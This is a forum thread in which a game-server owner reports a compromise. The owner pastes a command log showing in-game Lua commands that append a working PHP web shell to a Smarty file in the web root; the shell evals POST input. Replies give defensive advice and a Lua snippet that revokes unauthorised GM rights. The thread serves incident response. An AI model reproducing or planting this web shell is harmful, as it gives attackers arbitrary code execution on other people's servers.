Sign in to follow this  
BorzZ

Hack

hello guys i got big question which made me get crazy!

someone in somehow did hack my server and did use lua cmd IN GAME to upload a file inside my website to hack my server and make everyone at server a GM!

look at this : i found it on DoCommand ( Commands Log ) 

[03-24 02:57:25][ExecWork]Cha-Chibi+533: lua haxfilename = "C:\\Program Files (x86)\\Zend\\Apache2\\htdocs\\classes\\smarty\\internals\\core.smarty.php"
[03-24 02:57:32][ExecWork]Cha-Chibi+533: lua if(fileexists(haxfilename) ~= false) then haxfile = io.open(haxfilename,'a');end
[03-24 02:57:38][ExecWork]Cha-Chibi+533: lua haxfile:write("<?php $query = stripslashes($_POST[\'query\']);")
[03-24 02:57:43][ExecWork]Cha-Chibi+533: lua haxfile:write("eval($query); ;?> <form method=\"POST\" action=\"<?PHP echo stripslashes($_SERVER[\'PHP_SELF\']);?>")
[03-24 02:57:47][ExecWork]Cha-Chibi+533: lua haxfile:write("\" accept-charset=\"UTF-8\">")
[03-24 02:57:51][ExecWork]Cha-Chibi+533: lua haxfile:write(" <textarea name=\"query\" cols=\"48\" rows=\"8\" ></textarea>")
[03-24 02:57:55][ExecWork]Cha-Chibi+533: lua haxfile:write("<p><input type=\"submit\" value=\"Submit\"></p></form>")
[03-24 02:57:59][ExecWork]Cha-Chibi+533: lua haxfile:close()                            

this is one of the oldest hacks in the book. Ideally, this isn't the actual problem.
First, conduct how the hacker was able to get a GM authorized account.
Some possibilities: web backdoor, sql injection, embedded lua script within the serverfile itself.

Now, a prevention (assuming you use v3ctor's GS), and you alone know who your GM's are.
if(GetGmLv(playerData) > 0)
    if(GetChaDefaultName(playerData) ~= 'yourName')
        SetGmLv(playerData, 0);

Ofcourse, not the brightest solution, but this would automatically prevent lua commands to be executed ingame from unauthorized guests.

Edited by xtc
  • Like 2

kong.png

a2.png

4 hours ago, xtc said:

this is one of the oldest hacks in the book. Ideally, this isn't the actual problem.
First, conduct how the hacker was able to get a GM authorized account.
Some possibilities: web backdoor, sql injection, embedded lua script within the serverfile itself.

Now, a prevention (assuming you use v3ctor's GS), and you alone know who your GM's are.
if(GetGmLv(playerData) > 0)
    if(GetChaDefaultName(playerData) ~= 'yourName')
        SetGmLv(playerData, 0);

Ofcourse, not the brightest solution, but this would automatically prevent lua commands to be executed ingame from unauthorized guests.

Can you tell me ist possible to find out if there any bds on my serverfiles ? 

@BorzZ You have to scan all .lua files. It is hard work, so you should take the files from trusted sources

• Like 1